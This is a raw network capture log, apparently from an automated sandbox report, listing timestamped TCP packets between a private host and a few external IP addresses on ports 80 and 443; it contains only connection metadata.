Apr 4, 2024 17:49:06.855715036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855750084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855753899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855786085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855832100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855844021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855858088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855874062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855878115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855896950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855926991 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855932951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855990887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855990887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856038094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856055021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856075048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856092930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856096029 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856121063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856132984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856149912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856187105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856192112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856210947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856234074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856255054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856290102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856307983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856324911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856328011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856348038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856364012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856381893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856400967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856415987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856419086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856441021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856458902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856477976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856496096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856502056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856535912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856550932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856584072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856601954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856623888 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856635094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856652975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856673956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856690884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856724024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856759071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.856764078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.856792927 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.858983994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.859955072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.912468910 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:06.912506104 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:06.912592888 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:06.925595045 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:06.925611973 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:06.979370117 CEST	80	49732	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:06.979423046 CEST	80	49732	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:06.979427099 CEST	49732	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.979469061 CEST	49732	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.979821920 CEST	49732	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.043114901 CEST	80	49733	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.043143034 CEST	80	49733	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.043199062 CEST	49733	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.043221951 CEST	49733	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.043328047 CEST	49733	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.162648916 CEST	80	49732	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.192650080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192730904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192747116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192768097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192786932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192810059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192827940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192835093 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.192847967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192872047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192883015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.192893028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192912102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.192915916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192930937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.192934990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192956924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.192989111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193027973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193042994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193080902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193083048 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193101883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193119049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193124056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193180084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193211079 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193228960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193243980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193263054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193283081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193299055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193319082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193336010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193355083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193377972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193392038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193411112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193428993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193434000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193470001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193506956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193511009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193526983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193542004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193546057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193566084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193586111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193608046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193720102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193737984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193758011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193758965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193777084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193792105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193795919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193811893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193834066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193870068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193902016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.193912029 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193939924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.193996906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194015980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194035053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194056034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194065094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194075108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194089890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194092035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194128036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194135904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194147110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194165945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194184065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194205046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194228888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194236040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194246054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194264889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194303036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194307089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194323063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194335938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194341898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194376945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194377899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194396019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194413900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194451094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194454908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194490910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194524050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194529057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194539070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194572926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194606066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194623947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194643021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194645882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194684029 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194715977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194736004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194753885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194770098 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194776058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194792986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194812059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194820881 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194829941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194849014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194854021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194885015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194890976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.194921017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194957972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.194997072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195040941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195056915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195067883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195076942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195127964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195130110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195144892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195164919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195184946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195185900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195205927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195207119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195225954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195245028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195281982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195302010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195327997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195329905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195343971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195358992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195384026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195403099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195417881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195426941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195453882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195458889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195472956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195492983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195516109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195550919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195566893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195583105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195586920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195606947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195662022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195668936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195677996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195713997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195724964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195750952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195787907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195795059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195807934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195828915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195851088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195856094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195871115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195874929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195895910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195904970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195913076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195950031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.195954084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.195970058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196022987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196041107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196059942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196080923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196080923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196114063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196134090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196152925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196171045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196182013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196204901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196208000 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196264029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196283102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196301937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196304083 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196321964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196341038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196341038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196353912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196360111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196379900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196398973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196402073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196418047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196434975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196438074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196489096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196506977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196525097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196527958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196556091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196582079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196583986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196600914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196619034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196654081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196675062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196692944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196711063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196715117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196729898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196746111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196767092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196773052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196788073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196805954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196825981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196846008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196847916 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196866035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196877003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196893930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196919918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196938038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196955919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196974993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.196978092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.196995020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197026014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197066069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197101116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197103024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197138071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197206020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197223902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197242022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197243929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197272062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197278023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197298050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197315931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197315931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197338104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197357893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197375059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197392941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197411060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197447062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197463989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197482109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197500944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197503090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197530985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197541952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197559118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197577000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197594881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197597027 CEST	49730	80	192.168.2.10	103.23.232.80
